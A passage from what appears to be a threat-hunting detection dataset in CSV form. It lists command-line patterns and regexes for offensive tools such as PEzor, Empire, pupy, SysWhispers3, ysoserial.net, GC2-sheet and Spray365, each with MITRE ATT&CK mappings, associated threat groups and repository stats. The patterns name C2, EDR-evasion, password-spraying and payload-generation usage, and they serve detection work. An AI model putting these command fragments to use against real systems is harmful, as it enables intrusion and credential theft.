Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -format=service-exe *.exe*",".{0,1000}\s\-format\=service\-exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* fox-info.nse*",".{0,1000}\sfox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* freelancer-info.nse*",".{0,1000}\sfreelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Freeze.rs/*",".{0,1000}\sFreeze\.rs\/.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "* FROM LDAPHUNTERFINDINGS*",".{0,1000}\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "* fscan.exe*",".{0,1000}\sfscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscan32.exe*",".{0,1000}\sfscan32\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscan64.exe*",".{0,1000}\sfscan64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscanarm64.exe*",".{0,1000}\sfscanarm64\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscanarmv6.exe*",".{0,1000}\sfscanarmv6\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* fscanarmv7.exe*",".{0,1000}\sfscanarmv7\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "* ftp-anon.nse*",".{0,1000}\sftp\-anon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-bounce.nse*",".{0,1000}\sftp\-bounce\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-brute.nse*",".{0,1000}\sftp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-libopie.nse*",".{0,1000}\sftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-log4shell.nse*",".{0,1000}\sftp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* ftp-proftpd-backdoor.nse*",".{0,1000}\sftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* FtpSniffer *",".{0,1000}\sFtpSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* ftp-syst.nse*",".{0,1000}\sftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-vsftpd-backdoor.nse*",".{0,1000}\sftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-vuln-cve2010-4221.nse*",".{0,1000}\sftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* FudgeC2 *",".{0,1000}\sFudgeC2\s.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "* -FullPrivs * ",".{0,1000}\s\-FullPrivs\s.{0,1000}\s","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*",".{0,1000}\s\-\-functions\sNtProtectVirtualMemory.{0,1000}NtWriteVirtualMemory\s\-o\ssyscalls_mem.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "* fuzz -u * -p *--target*",".{0,1000}\sfuzz\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "* FUZZ:FUZZ *",".{0,1000}\sFUZZ\:FUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* --fuzzers addition*",".{0,1000}\s\-\-fuzzers\saddition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers bitsquatting*",".{0,1000}\s\-\-fuzzers\sbitsquatting.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers cyrillic*",".{0,1000}\s\-\-fuzzers\scyrillic.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers dictionary*",".{0,1000}\s\-\-fuzzers\sdictionary.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers homoglyph*",".{0,1000}\s\-\-fuzzers\shomoglyph.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers hyphenation*",".{0,1000}\s\-\-fuzzers\shyphenation.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers insertion*",".{0,1000}\s\-\-fuzzers\sinsertion.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers omission*",".{0,1000}\s\-\-fuzzers\somission.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers repetition*",".{0,1000}\s\-\-fuzzers\srepetition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers replacement*",".{0,1000}\s\-\-fuzzers\sreplacement.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers subdomain*",".{0,1000}\s\-\-fuzzers\ssubdomain.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers transposition*",".{0,1000}\s\-\-fuzzers\stransposition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* --fuzzers vowel-swap*",".{0,1000}\s\-\-fuzzers\svowel\-swap.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "* FWUprank.ps1",".{0,1000}\sFWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -g ActivitySurrogateSelector*",".{0,1000}\s\-g\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -g ClaimsPrincipal *",".{0,1000}\s\-g\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -g -n --kerberoast*",".{0,1000}\s\-g\s\-n\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -g PSObject *",".{0,1000}\s\-g\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* -g TextFormattingRunProperties *",".{0,1000}\s\-g\sTextFormattingRunProperties\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* --gadget ActivitySurrogateSelector*",".{0,1000}\s\-\-gadget\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* --gadget ClaimsPrincipal *",".{0,1000}\s\-\-gadget\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* --gadget PSObject *",".{0,1000}\s\-\-gadget\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* ganglia-info.nse*",".{0,1000}\sganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* GC2-sheet*",".{0,1000}\sGC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "* gcat.py -*",".{0,1000}\sgcat\.py\s\-.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "* gen -f client -O windows -A x64*",".{0,1000}\sgen\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* gen -S -f client -O windows -A x64*",".{0,1000}\sgen\s\-S\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* generate audit -ep *--passwords_in_userfile*",".{0,1000}\sgenerate\saudit\s\-ep\s.{0,1000}\-\-passwords_in_userfile.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep * -d * -u * -pf *",".{0,1000}\sgenerate\snormal\s\-ep\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-pf\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" 